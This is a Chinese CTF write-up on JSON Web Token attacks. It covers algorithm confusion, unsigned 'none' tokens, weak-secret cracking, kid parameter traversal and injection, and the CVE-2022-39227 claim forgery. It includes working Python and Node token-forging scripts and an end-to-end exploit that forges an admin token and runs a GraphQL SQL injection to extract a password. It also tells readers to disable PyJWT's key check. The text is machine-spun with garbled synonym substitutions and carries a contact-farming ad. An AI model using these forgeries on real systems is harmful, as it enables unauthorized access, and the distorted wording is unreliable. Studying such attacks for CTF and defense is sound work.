前言
在2022祥云杯时遇到有关JWT的题,其时没有思路,对JWT进行学习后来对此进行简略总结,希望能对正在学习JWT的师傅们有所协助。
JWT
JWT,即JSON WEB TOKEN,它是一种用于通讯双方之间传递安全信息的简练的、URL安全的表述性声明规范,是一种标准化的格局,用于在体系之间发送经过加mi签名的JSON数据,理论上能够包括任何类型的数据,但最常用于发送关于用户的信息(“声明”),以进行身份认证、会话处理和拜访操控。
简略了解了它的界说后,咱们接下来来看一下JWT的组成部分它分为三个部分,如下所示
1、Headers:头部
2、Payload:有用载荷
3、Signature:签名
这三个部分以.符号来衔接,所以JWT的格局通常是xxx.yyy.zzz这种样子
Headers
Headers通常由两部分组成,令牌的类型和签名算法,常见的算法有很多种,例如 HMAC SHA256或 RSA。但它也还有一个kid参数,这是一个可选参数,全称是key ID,它用于指定加mi算法的密miyao。
示例如下
ewogICJhbGciOiAiSFMyNTYiLAogICJ0eXAiOiAiSldUIgp9
这便是一个Headers,当咱们对它进行Base64解码就能够看到它的详细内容,详细如下
{
"alg": "HS256",
"typ": "JWT"
}
alg指的便是算法,这儿的算法便是HS256,typ指的是令牌类型。这儿需求阐明一点,便是明文在加mi时其实选用的是Base64URL加mi,这种加mi办法并非Base64encode+URLencode,而是对一些特别字符进行了替换,详细阐明如下
JWT 作为一个令牌(token),有些场合或许会放到 URL(比方 api.example.com/?token=xxx)。Base64有三个字符+、/和=,在 URL 里面有特别含义,所以要被替换掉:=被省掉、+替换成-,/替换成_ 。这便是 Base64URL 算法。
Payload
有用载荷便是寄存有用信息的当地,其间包括声明。声明包括三个部分 1、已注册声明这个部分的话便是现已预先界说过的声明,常见的声明首要有以下几种
iss: jwt签发者
sub: jwt所面向的用户
aud: 接收jwt的一方
exp: jwt的过期时刻,这个过期时刻必须要大于签发时刻
nbf: 界说在什么时刻之前,该jwt都是不可用的.
iat: jwt的签发时刻
jti: jwt的唯一身份标识,首要用来作为一次性token,然后逃避重放进犯。
2、公共的声明这些能够由运用 JWT 的人随意界说,一般用于添加用户的相关信息或其他事务需求的必要信息。但不主张添加灵敏信息,由于该部分在客户端可进行解码.3、私有的声明这些是为在同意运用它们的各方之间同享信息而创立的自界说声明,私有声明是供给者和消费者所共同界说的声明,一般不主张寄存灵敏信息。
示例如下
ewoJInN1YiI6ICJhZG1pbiIsCiAgICAidXNlcl9yb2xlIiA6ICJhZG1pbiIsCiAgICAiaXNzIjogImFkbWluIiwKICAgICJpYXQiOiAxNTczNDQwNTgyLAogICAgImV4cCI6IDE1NzM5NDAyNjcsIAogICAgIm5iZiI6IDE1NzM0NDA1ODIsIAogICAgImp0aSI6ICJkZmY0MjE0MTIxZTgzMDU3NjU1ZTEwYmQ5NzUxZDY1NyIgICAKfQ
进行base64URL解码,成果如下
{
"sub": "admin", //jwt所面向的用户
"user_role" : "admin", //当时登录用户
"iss": "admin", //该JWT的签发者,有些是URL
"iat": 1573440582, //签发时刻
"exp": 1573940267, //过期时刻
"nbf": 1573440582, //该时刻之前不接收处理该Token
"jti": "dff4214121e83057655e10bd9751d657" //Token唯一标识
}
Signature
由于头部和有用载荷以明文形式存储,因而,需求运用签名来防止数据被篡改。所以这部分是一个签证信息,这个签证信息由三部分组成
1、header (base64URL编码)
2、payload (base64URL编码)
3、secret(miyao)
它的核算办法如下
Signature=HMACSHA256(base64UrlEncode(header) + "." +base64UrlEncode(payload),secret)
//假定这儿是HS256算法,假如是其他算法的话最初设置为其他算法即可
现在了解了JWT的大致作用和其组成,接下来来学习一下JWT进犯。
JWT 进犯
JWT进犯有多种状况,现在来对其进行逐个解说。
灵敏信息泄露
JWT确保的是数据传输过程中的完整性而不是机密性。
由于JWT的payload部分是运用Base64url编码的,所以它其实是相当于明文传输的,当payload中携带了灵敏信息时,咱们对payload部分进行Base64url解码,就能够读取到payload中携带的灵敏信息。
靶场演示
标题描绘如下
JWT 的头部和有用载荷这两部分的数据是以明文形式传输的,假如其间包括了灵敏信息的话,就会发生灵敏信息泄露。试着找出FLAG。格局为 flag{}
进入环境后发现一个登录框
随意输入账号mima,登录后发现界面如下
检查此刻的JWT
想到标题中说头部和载荷或许会有灵敏泄露,将值取出别离进行Base64URL解码
两处拼接一下,得到ctfhub{bb89d985db8cea6a2f2d34cb}
【—-协助网安学习,资料@~w:yj009991,补白“”获取!】
① 网安学习生长途径思维导图
② 60+网安经典常用东西包
③ 100+SRC剖析陈述
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)
算法修正进犯
首要来简述一下JWT中两个常用的加mi算法
HMAC(HS256):是一种对称mi算法,运用秘密miyao对每条消息进行签名和验证RSA(RS256):是一种非对称mi算法,运用私yaomi明文,公yao解mi。
从上面不难看出,HS256从头到尾只要一个miyao,而RS256是有两个miyao的。在通常状况下,HS256的miyao咱们是不能取到的,RS256的miyao也是很难获得的,RS256的的公yao相对较简略获取,但不管是HS256加mi还是RS256加mi,都是无法完结假造JWT的,但当咱们修正RSA256算法为HS256算法时,后端代码会运用公yao作为miyao,然后用HS256算法验证签名,假如咱们此刻有公yao,那么此刻咱们就可与完结JWT的假造。
靶场演示
标题描绘
有些JWT库支持多种mima算法进行签名、验签。若目标运用非对称mima算法时,有时进犯者能够获取到公yao,此刻可经过修正JWT头部的签名算法,将非对称mima算法改为对称mima算法,然后达到进犯者意图。
进入环境后发现标题代码
class JWTHelper {
public static function encode($payload=array(), $key='', $alg='HS256') {
return JWT::encode($payload, $key, $alg);
}
public static function decode($token, $key, $alg='HS256') {
try{
$header = JWTHelper::getHeader($token);
$algs = array_merge(array($header->alg, $alg));
return JWT::decode($token, $key, $algs);
} catch(Exception $e){
return false;
}
}
public static function getHeader($jwt) {
$tks = explode('.', $jwt);
list($headb64, $bodyb64, $cryptob64) = $tks;
$header = JWT::jsonDecode(JWT::urlsafeB64Decode($headb64));
return $header;
}
}
$FLAG = getenv("FLAG");
$PRIVATE_KEY = file_get_contents("/privatekey.pem");
$PUBLIC_KEY = file_get_contents("./publickey.pem");
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (!empty($_POST['username']) && !empty($_POST['password'])) {
$token = "";
if($_POST['username'] === 'admin' && $_POST['password'] === $FLAG){
$jwt_payload = array(
'username' => $_POST['username'],
'role'=> 'admin',
);
$token = JWTHelper::encode($jwt_payload, $PRIVATE_KEY, 'RS256');
} else {
$jwt_payload = array(
'username' => $_POST['username'],
'role'=> 'guest',
);
$token = JWTHelper::encode($jwt_payload, $PRIVATE_KEY, 'RS256');
}
@setcookie("token", $token, time()+1800);
header("Location: /index.php");
exit();
} else {
@setcookie("token", "");
header("Location: /index.php");
exit();
}
} else {
if(!empty($_COOKIE['token']) && JWTHelper::decode($_COOKIE['token'], $PUBLIC_KEY) != false) {
$obj = JWTHelper::decode($_COOKIE['token'], $PUBLIC_KEY);
if ($obj->role === 'admin') {
echo $FLAG;
}
} else {
show_source(__FILE__);
}
}
?>
简略的看一下,大致意思便是当以用户名为admin,mima不是$flag时,此刻登录后JWT中payload的role是guest,而只要当role为admin时才能够得到Flag,所以咱们这儿肯定是需求假造JWT的,咱们先以admin为用户名,随意输入mima登录一下此刻得到JWT,将其拿去解mi一下
发现加mi办法是RS256非对称加mi,想到在登录时,下方给出了公yao
所以这儿就能够测验更改算法为HS256,以公yao作为miyao来进行签名和验证,因而咱们结构一个假造JWT的脚本,内容如下
import jwt
import base64
public ="""-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqizf1rnxqfeyCAp52TQO
3uEyeB1HzqqbO8FBHWqLlhgmyPFqaopXVhZryzP+Sd6a3iQd8xeD7URswPHE4roA
kbI1GMta9zAdD1yPtp//JNZ55hx1iFY2n9gw2u8VL64n9sCc56H46L3W52Z37kvW
q5LuoLAuyJpP7Ofadt7biWaeXibZGQjPwlbCy31DyxdDFCt8pVrajVI97w3amHBU
Xhd0Ku+DOq9hjadtQbTkbIkAUR84yqt+25EXd/rg1w8we9ysNcTjAeUayRGPuQmX
UWJaFpsvuL7WeUb2xJqvieFwsCQppS1ZgaoRc0F835K+G3s3qWRi4AnvZxryfTzl
awIDAQAB
-----END PUBLIC KEY-----
"""
payload={ "username": "admin","role": "admin"}
print(jwt.encode(payload, key=public, algorithm='HS256'))
此刻运转完后发现报错
这个是由于源代码中进行了校验,咱们简略设置一下即可,源代码文件地址如下
/usr/lib/python3/dist-packages/jwt/algorithms.py
咱们在它的校验前面增加这样一句话
invalid_strings=[]
此刻保存退出,再运转文件即可得到新JWT
将新的JWT拿到网站中替换旧的JWT,改写网站即可得到flag
未验证签名
当用户端提交请求给应用程序,服务端或许没有对token签名进行校验,这样,进犯者便能够经过供给无效签名简略地绕过安全机制,此刻就造成了越权缝隙的呈现。假定现有payload如下
{
"iat": 1668871293,
"exp": 1668878493,
"nbf": 1668871293,
"sub": "quan9i",
}
这儿的quan9i是普通用户,按理说的话它是无法拜访到办理员的界面的,但由于这儿的签名是没有验证的,当咱们修正payload时,这个JWT依然有用,所以咱们修正payload如下
{
"iat": 1668871293,
"exp": 1668878493,
"nbf": 1668871293,
"sub": "admin",
}
此刻就垂直越权,变成了办理员用户,能够拜访办理员的界面。
靶场演示
标题描绘
本试验运用根据 JWT 的机制来处理会话。由于实施缺点,服务器不会验证它收到的任何 JWT 的签名。
标题要求
要处理试验室问题,请修正您的会话令牌以获取对办理面板的拜访权限/admin,然后删去用户carlos。
标题条件
您能够运用以下凭证登录到您自己的帐户:wiener:peter
翻开环境后发现Cookie中没什么东西,但想到标题给出了账号,那就先找登录点,发现有个My account
点击检查,发现是登录界面,将刚刚标题条件中所给的用户名和mima放入
此刻检查cookie
详细内容为
eyJraWQiOiIxYmE5NjA0Ny0wNjBiLTQ0MTAtODg1NC01YWYxYTQ2ZTljYWEiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY2OTI5NzgxMH0.JMb3Ttl7WLoVrTfcEq03VIafh7zDMu5_nhMtPc3qnhgENSl1WbMAMFfeTa-v0jS69A13W-J3_ccslHu25OW_SRPAq2GuAUoFfEGtthnP-PaDWFN2_UIIcaeAx8rj8bNy65apX37EnTx-sPo274XjW9hQgTRLT1ifHtfihvTzoOY94_2bLaR4JwSUoyoi_kXZW4IndvhqpHA2kn8jw2aQOJCCCjeHh2r_CDDQA1hrSKeP2FgIq07wagLZqzkG6ATexINTNI_4jwpO8Jy1U-l0voPQQ6g111GCkBDhhkCagnm4zh-_Kl2nDD-Xjp74VVZDCNojbLoeS2Y6RGPZ4GR28w
对第一个.后和第二个.之前的内容进行解码(此部分内容为有用载荷)得到
{"iss":"portswigger","sub":"wiener","exp":1669297810}
标题提示了这儿不校验签名,所以咱们修正payload如下
{"iss":"portswigger","sub":"administrator","exp":1669297810}
再对其进行Base64URL编码,替换掉原本的payload,此刻就得到了新的JWT,将新的JWT放入session中,重新拜访此界面,发现多了一个功能点
发现能够删去用户
任务完结。
空加mi算法
这儿需求先介绍一些运用的知识点
将signature置空。运用node的jsonwentoken库已知缺点:当jwt的signature为null或undefined时,jsonwebtoken会选用algorithm为none进行验证
JWT支持运用空加mi算法,能够在header中指定alg为none,此刻只要把signature设置为空,提交到服务器,任何token都能够经过服务器的验证。
假定现有JWT(解码后的,无signature的)如下
{
"alg" : "Hs256",
"typ" : "jwt"
}
{
"user" : "quan9i"
}
这儿咱们指定alg为None,修正Payload中的user为admin,如下所示
{
"alg" : "None",
"typ" : "jwt"
}
{
"user" : "admin"
}
此刻再进行Base64URL编码,就能够完结越权,得到办理员才能够拜访的界面。
靶场演示
标题描绘
本试验运用根据 JWT 的机制来处理会话。服务器未安全地配置为接受未签名的 JWT。
标题要求
要处理试验室问题,请修正您的会话令牌以获取对办理面板的拜访权限/admin,然后删去用户carlos。
标题条件
您能够运用以下凭证登录到您自己的帐户:wiener:peter
进入环境后先去登录
得到JWT,标题提示了接受未签名的JWT,所以将第二个点后的内容直接删去,然后再对前面内容进行Base64解码
{"kid":"16adc077-c753-4bbe-a9df-46688c01ac46","alg":"RS256"}.{"iss":"portswigger","sub":"wiener","exp":1669304815}.
修正headers中的alg为none,修正payload中的sub为administrator,然后别离进行Base64URL编码,即可得到新的JWT,在网站中对JWT进行替换,接下来再次拜访此网站,发现新功能点。
点进去发现有删去用户的功能
任务完结。
po解miyao
这个的话其实便是运用东西来对miyao进行po解,然后完结越权。这个的话在参阅过其他师傅的文章后发现是有一些条件的,详细如下所示
1、JWT运用的加mi算法是HS256加mi算法
2、一段有用的、已签名的token
3、签名用的miyao不杂乱(弱miyao)
然后这儿还需求介绍一下po解miyao用的东西,装置办法如下所示
1、git clone https://github.com/brendan-rius/c-jwt-cracker #下载
2、make #编译
运用办法如下
./jwtcrack JWT
这是一个,还有一个po解东西,能够引证字典,装置办法如下所示
1、git clone https://github.com/Sjord/jwtcrack
2、pip install PyJWT tqdm
它的运用办法如下
python3 crackjwt.py JWT dictionary.txt //字典文件是自己写入的
靶场演示
标题描绘
本试验运用根据 JWT 的机制来处理会话。它运用极弱的miyao来签署和验证令牌。这能够很简略地运用一个包括常见secret的单词表来暴力破解。
标题要求
要处理试验室问题,请首要暴力破解网站的miyao。获得此后,运用它签署修正后的会话令牌,使您能够拜访办理面板/admin,然后删去用户carlos
标题条件
您能够运用以下凭证登录到您自己的帐户:wiener:peter
进入环境后,依旧是先登录获取当时JWT
由于标题现已提示了这儿用的是暴力破解,所以咱们用刚刚提到的东西,来po解一下miyao
./jwtcrack eyJraWQiOiIyZjRlMzM0Yy1lMzZjLTRhNWQtOWVjYi03ZDhkZDJhYThlYjMiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY2OTMwNzYwNn0.iMBR0rqiUQKT1a1YoonpXNY5hCNz16okJB9tbog0QRE
这儿po解屡次均未得到miyao,所以咱们挑选换另一个东西,自己找个字典来进行po解,接下来运用东西指定字典来进行po解
python3 crackjwt.py eyJraWQiOiIyZjRlMzM0Yy1lMzZjLTRhNWQtOWVjYi03ZDhkZDJhYThlYjMiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY2OTMwNzYwNn0.iMBR0rqiUQKT1a1YoonpXNY5hCNz16okJB9tbog0QRE dictionary.txt
得到miyao为secret1进入解码网站,对jwt进行解码
修正payload中的sub为administrator,再在下方写入miyaosecret1,生成新JWT
拿到网站中替换原JWT,发现新功能点
拜访后发现能够删去用户
任务完结。
Kid参数注入
前文在简述Headers提到,它还有一个可选参数kid,当Headers中存在这个参数时,咱们能够经过修正这个参数完结目录遍历、SQL注入等进犯
#目录遍历
{
"kid" : "/etc/passwd"
}
Kid参数的逻辑是类似于sql=”select * from table where kid=$kid”这种,所以它是存在SQL注入缝隙的,示例如下
#sql注入
{
"kid" : "0 union select 123"
}
此刻它的Kid就被咱们恶意篡改为123,此刻就相当于拿到了Key,能够假造JWT,完结越权。
靶场演示
标题描绘
本试验运用根据 JWT 的机制来处理会话。为了验证签名,服务器运用JWTkid标头中的参数从其文件体系中获取相关miyao
标题要求
要处理试验室问题,请假造一个 JWT,使您能够拜访办理面板/admin,然后删去用户carlos。
标题条件
您能够运用以下凭证登录到您自己的帐户:wiener:peter
进入环境后,登录获取JWT装置插件
装置后挑选New Symmetric Key,生成一个Key
接下来修正K参数为AA==,点击承认抓靶场的包
点击下面的sign
将此刻的JWT去替换网站的JWT,再改写网站
成功越权
简略说一下这儿的原理:这儿其实便是运用了kid的目录遍历进犯,咱们将kid参数指向标准文件/dev/null,此刻咱们再运用bp的东西设置一个空的签名miyao,就完结了越权,成功得到办理员权限。
一起,这个Kid是Headers的一部分,Headers其实还有两个不常用的参数,即Jwk和Jku,这两个的话也是存在缝隙的,他们的进犯办法同Kid是较为类似的,所以这儿不再去演示怎样进犯。靶场环境如下,有爱好的师傅能够看看。
JWT进犯实例
CVE-2022-39227
这个的话并没有给出详细的POC,可是官方在commit中最下方给出了测验代码,详细代码如下所示
""" Test claim forgery vulnerability fix """
from datetime import timedelta
from json import loads, dumps
from test.common import generated_keys
from test import python_jwt as jwt
from pyvows import Vows, expect
from jwcrypto.common import base64url_decode, base64url_encode
@Vows.batch
class ForgedClaims(Vows.Context):
""" Check we get an error when payload is forged using mix of compact and JSON formats """
def topic(self):
""" Generate token """
payload = {'sub': 'alice'}
return jwt.generate_jwt(payload, generated_keys['PS256'], 'PS256', timedelta(minutes=60))
class PolyglotToken(Vows.Context):
""" Make a forged token """
def topic(self, topic):
""" Use mix of JSON and compact format to insert forged claims including long expiration """
[header, payload, signature] = topic.split('.')
parsed_payload = loads(base64url_decode(payload))
parsed_payload['sub'] = 'bob'
parsed_payload['exp'] = 2000000000
fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))
return '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'
class Verify(Vows.Context):
""" Check the forged token fails to verify """
@Vows.capture_error
def topic(self, topic):
""" Verify the forged token """
return jwt.verify_jwt(topic, generated_keys['PS256'], ['PS256'])
def token_should_not_verify(self, r):
""" Check the token doesn't verify due to mixed format being detected """
expect(r).to_be_an_error()
expect(str(r)).to_equal('invalid JWT format')
重点在中间部分,也便是这儿
def topic(self, topic):
""" Use mix of JSON and compact format to insert forged claims including long expiration """
[header, payload, signature] = topic.split('.')
parsed_payload = loads(base64url_decode(payload))
parsed_payload['sub'] = 'bob'
parsed_payload['exp'] = 2000000000
fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))
return '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'
能够看到这儿的话首要是对JWT进行了拆分,咱们知道JWT的格局是xxx.yyy.zzz,这个以.来别离,那便是把三部分拆分开来,别离赋值给了header、payload和signature,接下来将进行了base64URL以及json解码的payload赋值给了parsed_payload,然后将新内容sub=bob以及exp=2000000000放入了parsed_payload中,将进行过Base64编码和json编码的parsed_payload赋值给了fake_payload,终究生成的JWT格局如下
{" header.fake_payload.":"","protected":"header", "payload":"payload","signature":"signature"}
此刻就完结了JWT的假造。
那么这个缝隙是怎样发生的呢?接下来咱们看一下源文件。检查python_jwt/__init__.py文件
首要看到 header, claims, _ = jwt.split(‘.’),它按.进行拆分,怎样别离将三部分赋值给headers,claims以及_。接下来便是对头部进行解码,然后查验头部算法,后边也是校验属性的,接下来走到JWS这儿
if pub_key: #验证是否传入miyao
token = JWS()
token.allowed_algs = allowed_algs
token.deserialize(jwt, pub_key) # 传入整个用户的JWT,JWS对JWT进行反序列化处理
parsed_claims = json_decode(token.payload) # JWS对传入部分进行json解码
跟进反序列化,看它是怎样做的
这儿的话便是首要测验对传入的JWT进行解析,咱们知道这儿传入的是完整的原始JWT,而非拆分后的某个部分,JWT的格局是xxx.yyy.zzz这种,而json能解析的是{“a”:1,”b”:2,”c”:3,”d”:4,”e”:5}这种格局的,所以它无疑会走向except ValueError这儿,然后它对值进行拆分,别离赋给protected、payload和signature,然后就将o赋值给了self.objects,这儿的话还有一个verify(key,alg)函数,咱们跟进一下
这儿能够看到它其实是对JWT的各部分内容进行了一个查验,它这儿查验的是原本的完整的JWT,所以这个肯定是没有问题的,这个验证肯定是能够经过的。
咱们此刻回到__init__.py
发现这儿在校验往后,后边都没有再用到token这个,后边是对header和claims中的一些参数进行校验,然后将parsed_header和parsed_claims值回来了。这儿便是问题所在, 在对整个JWT进行校验往后,没有回来校验过的数据,而是回来一开始进行点分往后的数据。
咱们的恶意payload如下所示
此刻拆分后他一直在校验的是后边的灰色部分,这部分是原始的JWT,校验肯定是能够经过的,而咱们终究回来的数据是前面的forged_payload,所以不管前面怎样添加,怎样替换,校验都是能够经过的。此刻你再去看官方给出的测验代码就能够理解它的思路了。
CTF实战
CTFshow系列
Web345
翻开靶场,进入环境
看一下源代码
提示了admin界面,先记取。一起刚刚发现cookie含有JWT,放入网站中检查一下
加mi办法为空加mi,所以这儿的话,咱们base64解码一下,然后直接修正sub为admin,再进行base64编码,放入cookie中即可,接下来拜访admin界面
web346
这儿进入环境后,接下来进入靶场,看一下JWT,用解mi网站解mi一下
发现有了加mi格局,然后这儿存在一种缝隙便是能够把加mi办法换成空加mi来绕过,可是这个网站是不能直接修正的,咱们这儿能够凭借python脚本完结,脚本如下所示
import time
import jwt
# payload
token_dict={
"iss": "admin",
"iat": 1668871293,
"exp": 1668878493,
"nbf": 1668871293,
"sub": "admin",
"jti": "9892b9d99098ba229891bedcfa856b61"
}
# headers
headers = {
"alg": "none",
"typ": "JWT"
}
jwt_token = jwt.encode(token_dict, # payload, 有用载体
key='',
headers=headers, # json web token 数据结构包括两部分, payload(有用载体), headers(标头)
algorithm="none", # 指明签名算法办法, 默认也是HS256
) # python3 编码后得到 bytes, 再进行解码(指明解码的格局), 得到一个str
print(jwt_token)
注:这儿装置jwt模块的时分,装置的模块是PyJWT模块,一起不要给脚本姓名命名为jwt.py,不然运转脚本时就会发生报错。
接下来运转脚本
得到JWT
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTY2ODg3MTI5MywiZXhwIjoxNjY4ODc4NDkzLCJuYmYiOjE2Njg4NzEyOTMsInN1YiI6ImFkbWluIiwianRpIjoiOTg5MmI5ZDk5MDk4YmEyMjk4OTFiZWRjZmE4NTZiNjEifQ.
去靶场中替换一下,一起拜访admin界面
Web347
提示弱口令,这儿应该说的是miyao,先记取进入环境后找到JWT去对应网站解码
HS256加mi办法,咱们这儿的话需求猜解一下miyao,然后修正才有用,既然提示了弱口令,那就能够试试123456这种,修正sub为admin,得到新JWT后去靶场中修正JWT,然后拜访admin界面
Web348
标题提示po解,这儿就需求先介绍一个po解东西了,装置办法也很简略
1、git clone https://github.com/brendan-rius/c-jwt-cracker #下载
2、make #编译
3、./jwtcrack JWT #运用
这儿将靶场中的JWT放入其间
po解出miyao为aaab,接下来办法就同上,在解码网站中,修正sub为admin,一起添加miyao为aaab,然后拿着得到的新JWT,去替换网站的JWT,再去拜访admin界面即可。
Web349
标题给了一个附件,内容如下
/* GET home page. */
router.get('/', function(req, res, next) {
res.type('html');
var privateKey = fs.readFileSync(process.cwd()+'//public//private.key');
var token = jwt.sign({ user: 'user' }, privateKey, { algorithm: 'RS256' });
res.cookie('auth',token);
res.end('where is flag?');
});
router.post('/',function(req,res,next){
var flag="flag_here";
res.type('html');
var auth = req.cookies.auth;
var cert = fs.readFileSync(process.cwd()+'//public/public.key'); // get public key
jwt.verify(auth, cert, function(err, decoded) {
if(decoded.user==='admin'){
res.end(flag);
}else{
res.end('you are not admin');
}
});
});
这儿发现能够获取公yao和私yao,RSA是用私yao加mi,公yao解mi,那么咱们这儿有私yao了,就能够自己写内容,然后用私yao加mi,接下来用公yao解mi便是咱们假造的内容,所以接下来拜访url /private.key获取私yao,然后写个小脚本即可
import jwt
public = open('private.key', 'r').read()
payload={"user":"admin"}
print(jwt.encode(payload, key=public, algorithm='RS256'))
接下来替换JWT,然后post拜访
web350
标题给了附件,在里面发现公yao
这儿的话应该考察的便是算法修正进犯,然后咱们这儿修正算法为HS256,然后用公钥加mi,脚本如下
const jwt = require('jsonwebtoken');
var fs = require('fs');
var privateKey = fs.readFileSync('public.key');
var token = jwt.sign({ user: 'admin' }, privateKey, { algorithm: 'HS256' });
console.log(token)
运转脚本需求装置jsonwebtoken库
得到JWT后替换一下,然后post发包即可获取flag
[祥云杯2022]FunWeb
注:由于这道题没有复现环境了,所以我这儿的部分图片是来源于网上
进入环境后是个注册界面,接下来随意注册账号后进行登录
发现上方是有两个功能点的
抓获取成果包后发现这儿提示no admin一起发现JWT,想到这儿或许需求假造JWT,JWT最近新出的缝隙是CVE-2022-39227。那么咱们就能够测验用这个缝隙来进行假造JWT,假造JWT脚本如下所示
from datetime import timedelta
from json import loads, dumps
from jwcrypto.common import base64url_decode, base64url_encode
def topic(topic):
""" Use mix of JSON and compact format to insert forged claims including long expiration """
[header, payload, signature] = topic.split('.')#点分
parsed_payload = loads(base64url_decode(payload))#解码
parsed_payload['is_admin'] = 1#假造
fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))#编码
return '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'#生成恶意载荷
token = topic('eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NjcxMzcwMzAsImlhdCI6MTY2NzEzNjczMCwiaXNfYWRtaW4iOjAsImlzX2xvZ2luIjoxLCJqdGkiOiJ4YWxlR2dadl9BbDBRd1ZLLUgxb0p3IiwibmJmIjoxNjY3MTM2NzMwLCJwYXNzd29yZCI6IjEyMyIsInVzZXJuYW1lIjoiMTIzIn0.YnE5tK1noCJjultwUN0L1nwT8RnaU0XjYi5iio2EgbY7HtGNkSy_pOsnRl37Y5RJvdfdfWTDCzDdiz2B6Ehb1st5Fa35p2d99wzH4GzqfWfH5zfFer0HkQ3mIPnLi_9zFiZ4mQCOLJO9RBL4lD5zHVTJxEDrESlbaAbVOMqPRBf0Z8mon1PjP8UIBfDd4RDlIl9wthO-NlNaAUp45woswLe9YfRAQxN47qrLPje7qNnHVJczvvxR4-zlW0W7ahmYwODfS-KFp8AC80xgMCnrCbSR0_Iy1nsiCEO8w2y3BEcqvflOOVt_lazJv34M5e28q0czbLXAETSzpvW4lVSr7g')
print(token)
接下来想到咱们抓的包的文件名是graphql,而且还有POST参数,或许存在graphql注入。然后运用 getscoreusingnamehahaha办法查询表结构。
{"query": """{ getscoreusingnamehahaha(name: "null' union select group_concat(sql) FROM sqlite_master; --"){ score name } }"""}
回来成果如下
CREATE TABLE users(
ID INTEGER PRIMARY KEY,
NAME TEXT NOT NULL,
PASSWORD TEXT NOT NULL,
SCORE TEXT NOT Null
)
因而能够用这个来查询admin用户成果,结构终究payload如下。
import json
from jwcrypto.common import base64url_decode, base64url_encode
import httpx
session = httpx.Client(base_url="http://eci-2zeavdwsk859vkrseg75.cloudeci1.ichunqiu.com/")
session.post("/signin", json={
"username": "test",
"password": "111"
}
)
_ = session.cookies.get("token")
[header, payload, signature] = _.split('.')
parsed_payload = json.loads(base64url_decode(payload))
parsed_payload['is_admin'] = 1
fake_payload = base64url_encode((json.dumps(parsed_payload, separators=(',', ':'))))
forged_jwt = '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'
session.cookies.delete("token")
session.cookies.set("token", forged_jwt)
data = {"query": """{ getscoreusingnamehahaha(name: "null' union select password FROM users WHERE name='admin'; --"){ score name } }"""}
response = session.post("/graphql", data=data)
print(response.text)
得到mima后去登录即可得到flag
[CISCN2019 华北赛区 Day1 Web2]ikun
进入后发现有登录和注册界面,惯例操作先注册后登录
提示要买到lv6,下划后发现能够买等级
这儿没有lv6,点击下一页看看依然没有找到lv6,但发现参数是GET型传参
这意味着咱们能够写个小脚原本查找lv6所在位置发现lv3对应的代码是lv3.png,那么lv6对应的便是lv6.png
脚本如下
import time
import requests
url = "http://8e197801-2f87-4e36-aee6-a2390b0f391e.node4.buuoj.cn:81/shop?page="
for i in range(1,300):
res = requests.get(url+str(i))
time.sleep(0.5)
if "lv6.png" in res.text:
print(i)
break
181页,找到后发现价格是天价,买不起
这儿抓包看一下
发现能够修正折扣,把这个discount修正为0.00000000000001然后发包
跳转到了另一个界面但无权限拜访再抓包
发现JWT,解码一下
咱们这儿想完结修正root为admin,需求有miyao,po解miyao能够用东西c-jwt-cracker得到,po解后得到miyao为1Kun
抓包,将得到的值赋给JWT,再发包接下来便是读取源码,然后进行Python反序列化获取终究flag,这儿不再演示。
后言
JWT的靶场有很多个,我这儿也仅仅运用了CTFhub和portswig等来进行演示,还有一些靶场,但鉴于考察点类似,这儿不再演示,有爱好的师傅能够自行测验。然后还有便是这儿的CVE缝隙的剖析我首要参阅了咱们战队lemon大师傅的解说,我们也能够看一下哇,最终的话本人也仅仅一个小白,假如有问题还请各位大师傅多多指教。
